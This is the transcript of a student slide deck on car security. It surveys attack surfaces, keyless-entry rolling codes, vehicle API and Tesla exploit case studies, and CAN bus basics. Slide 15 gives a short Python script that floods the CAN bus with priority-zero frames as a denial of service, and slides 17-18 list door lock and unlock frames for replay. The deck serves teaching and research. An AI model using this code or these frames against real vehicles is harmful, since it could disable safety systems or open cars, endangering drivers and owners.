Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Car Security

Dange
August 24, 2018

Car Security

Dange

August 24, 2018
Tweet

More Decks by Dange

Other Decks in Research

Transcript

  1. Car Security Attacking On the CAN Bus Student : Tien-Chih

    Lin@NCKU Advisor : PK, Birdman, Benson, Alan
  2. $ Outline • Attack Vector • Intro of CAN Bus

    • Security Issues on CAN Bus • Conclusion
  3. $ Physical Attack • Attack Interface • USB Ports •

    SD-Card Ports • CD-ROM / DVD-ROM • Touch Screen • CAT-5
  4. $ Scanning with nmap Device IP Port Service CID (Central

    Information Display) 192.168.90.100 22/tcp ssh 53/tcp domain 80/tcp http 111/tcp rpcbind 2049/tcp nfs 6000/tcp X11 IC (Instrument Cluster) 192.168.90.101 22/tcp ssh 111/tcp rpcbind 6000/tcp X11 Gateway 192.168.90.102 23/tcp telnet 1050/tcp java-or-OTGfileshare
  5. $ Remote Attack • Attack Interface • Bluetooth • Wi-Fi

    • Cellular Connection • Remote Keyless Entry • TPMS
  6. $ Case Study : Remote Keyless Entry • Rolling Code

    UID, enck ctr′, btn UID, enck ctr′ + 1 , btn UID, enck ctr′ + 2 , btn ctr ctr + ∆ validity windows Decrypt ctr’ if(ctr < ctr’ < ctr + ∆ ) ctr := ctr’ open/close
  7. $ Case Study : Remote Keyless Entry • Attack Rolling

    Code enck UID, ctr′, btn Attack crypto Attack key management
  8. $ Case Study : API • Controlling vehicle features of

    Nissan LEAFs across the globe via vulnerable APIs
  9. { status: 200, message: "success", BatteryStatusRecords: { OperationResult: "START", OperationDateAndTime:

    "jan 21, 2016 21:47", BatteryStatus: { Battery ChargingStatus: "NORMAL_CHARGING", BatteryCapacity: "12", BatteryRemainingAmount: "12", BatteryRemainingAmountWH: "", }, PluginState: "CONNECTED", CruisingRangeAcOn: "135664.0", Cruising RangeAcOff: "157904.0", NotificationDateAndTime: "2016/01/21 20:47", TargetDate: "2016/01/21 20:47" } } $ Respond
  10. $ Case Study : Wi-Fi • Black Hat 2017 :

    Free-fall: Tesla Hacking Get control of Wi-fi Exploit the Webkit Browser Root the in-vehicle system Patch and Disable AppArmor Bypass ECU’s firmware integrity verification Reprogram modified Gateway firmware Send malicious CAN msg on CAN Bus Get Control of CAN Bus CID ECUs
  11. $ What is CAN Bus? • Controller Area Network •

    Low cost, integrated controllers Head light Tail light Dash board Doors ABS Engine Control Suspension Control Gateway Low Speed CAN Body Control Bus High Speed CAN Powertrain Control Bus
  12. $ CAN Data Frame Format Arbitration Identifier(ArbID) 11 bits or

    29 bits Data Length Code (DLC) 4 bits Data Up to 8 Byte
  13. $ CAN Bus Arbitration • Support by Hardware • Software

    implementation becomes easily and immediacy. • priority : 0 > 1
  14. $ Fault Confinement Error Active Error Passive Bus Off Reset

    and Config REC => 127 or TEC => 127 TEC > 255 Reset, Config and Reception of 128x11 Recessive Bits REC < 127 or TEC < 127 REC: Receive Error Counter TEC: Transmit Error Counter
  15. $ Denial-of-Service import ics device = ics.find_devices()[0] ics.open_device(device) NetworkID =

    ics.NETID_HSCAN ics.set_bit_rate(device,500000,NetworkID) msg = ics.SpyMessage() # Setup the message msg.ArbIDOrHeader = 0x0 # CAN ID msg.NetworkID = NetworkID # Channel 1 on the ValueCAN msg.Data = (0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0) while(1): ics.transmit_messages(device, msg)
  16. $ Replay Attack Head light Tail light Dash board Doors

    ABS Engine Control Suspension Control Gateway Attacker
  17. $ Unlock the Door ArbID Data… 44D 4D,00,80,00,00,00,00,00 440 40,00,80,11,01,0F,0F,0F

    442 42,00,80,00,00,00,00,00 44D 4D,01,80,00,01,00,00,00 440 40,01,80,11,01,00,00,00 631 18,80,53,04,00,12,00,00
  18. $ Lock the Door ArbID Data… 44D 4D,00,80,00,00,00,00,00 440 40,00,80,11,01,0F,0F,0F

    442 42,00,80,00,00,00,00,00 44D 4D,01,80,00,01,00,00,00 440 40,01,80,11,01,00,00,00 631 18,80,53,02,00,12,00,00
  19. >_ Conclusion • Survey of the Car Security − The

    skill of cyber security is useful in Car security. • CAN Bus − A useful protocol before the car connect to the Internet. − Easy attack by DoS and replay attack.
  20. $ Reference • https://hitcon.org/2018/CMT/slide-files/d2_s0_r0_keynote.pdf • http://www.blackhat.com/docs/asia-15/materials/asia-15-Evenchick-Hopping-On- The-Can-Bus.pdf • http://www.cheyun.com/content/15847 •

    http://illmatics.com/carhacking.html • https://www.tomshardware.co.uk/intel-automotive-security-review-board,news- 51291.html • https://blog.lookout.com/hacking-a-tesla • https://www.blackhat.com/docs/us-17/thursday/us-17-Nie-Free-Fall-Hacking-Tesla- From-Wireless-To-CAN-Bus.pdf • https://www.cryptacus.eu/en/wp-content/uploads/201611_WG4_Garcia.pdf • https://www.troyhunt.com/controlling-vehicle-features-of-nissan/ • http://wiki.csie.ncku.edu.tw/embedded/CAN • https://goo.gl/kXyyhx